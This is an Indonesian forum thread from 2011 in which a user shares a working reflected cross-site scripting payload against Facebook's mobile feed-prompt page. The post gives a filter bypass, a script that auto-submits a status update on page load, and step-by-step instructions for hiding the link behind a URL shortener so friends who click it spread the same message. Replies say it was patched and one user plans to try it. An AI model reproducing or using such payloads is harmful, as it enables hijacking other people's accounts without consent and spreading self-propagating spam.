Page 1 of 2

JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 8:41 am
by wiLMaR_kiDz
pernah dapat url yg seperti ini di status fb temen ente??. : tinyurl.com/sampahh dll?..
nah, ane jg tadi(hari ini, tgl ini,bln ini,tahun ini) abis maghrib gak sngaja nglihat salah1 status temen ane yang rasanya ane aja gt, penasaran ya ane klik dong urlnya..wah...apa yang terjadi?.kok abis ke redirect kq malah blank?.
beuh, ane kirain koneksina putus.eh gak taunya ane buka profile, status ane ke-update otomatis yang isinya sama seperti status temen ane tadi..
nah, penasaran dong apa yg terjadi sebenernya...
akhirna ane usut sndiri, ternyata ada beberapa script yang bisa di selipin di facebook..hehehe..
setelah dapet, ane cobain and akhirna berhasil..
oke, kelmaan ceritanya neh, langsung aja..

disini, ane share PoC sederhananya..
cara kerjanya pertama ketika kita klik http://tinyurl.com/xxxxx link ini akan mengarah ke :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’


untuk by pass filter < diganti dengan %3c
Code: Select all
%3cscript>window.onload=function(){document.forms[0].message.value=’isi pesan yg akan di update’;document.forms[0].submit();}

isi pesannye silahkan di edit sesuai keinginan ente.. :)

angkah2 pembuatnya akan ane jelaskan seperti dibawah ini :
1. ente buka site sejenis tinyurl.com(buat linknya), lalu buka script pertama tadi di atas and paste-kan di notepad :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’


contoh cara bikinnye :
Code: Select all
%3cscript>window.onload=function(){document.forms[0].message.value=’ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh’;document.forms[0].submit();}


Maka, akan jadilah seperti ini :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh';document.forms[0].submit();}</script>


nah jadi status temen2 setelah nge-klik link ini : http://tinyurl.com/NarsisAhh akan mengupdate status ente secara otomatis menjadi seperti ini :
ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh

Contoh korban ane :
Image

oke, ane kira cukup sampe disini aja sharenya...
maaf kalo kurang berbobot, kurang bernutu, gak ada gunanya, alias OMD (Omong Doang) katenye Uncle Jack... :)

salam.

anak o0n

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 8:50 am
by nesta
itu bisa di blokir om, itu melalui -> share
itu di klik nanti akan menuju ke tempat semua orang yang kenak beginian ntar pilih blokir di pojok kiri bawah.
maap kalo salah :D

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 8:38 pm
by thekuro_08
bukan kah udah ke patch? :P

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 8:54 pm
by poni
iya. uda di pacth ama fb, tapi dengan script diatas masih bisa bikin diskonek

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 8:57 pm
by thekuro_08
poni wrote:iya. uda di pacth ama fb, tapi dengan script diatas masih bisa bikin diskonek


maksudnya bikin diskonek gimana? -_-
bingung

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Wed Mar 30, 2011 11:08 pm
by nesta
disconnect jaringan kita ya om?? kayaknya pernah dengar tapi gak tau caranya :ngakak:

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Thu Mar 31, 2011 8:58 pm
by b0c4h
nesta wrote:disconnect jaringan kita ya om?? kayaknya pernah dengar tapi gak tau caranya :ngakak:

DC jaringan kita kak??bunuh diri donk...:D
apa DC jaringan tmn qt??

.thx.

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Fri Apr 01, 2011 8:17 am
by plenduz
manteb nih... coba ahh.. makasih om

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Fri Apr 01, 2011 4:46 pm
by tabun
wahhh,,,,,
tmen ane pernah kna tuh kax,,,,,,
yg parah nya pesennya "ini foto aq waktu lagi ML.."
:ngakak: :ngakak:

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

PostPosted: Sun Apr 03, 2011 5:18 pm
by Darkzzzz
Udah di Patch :p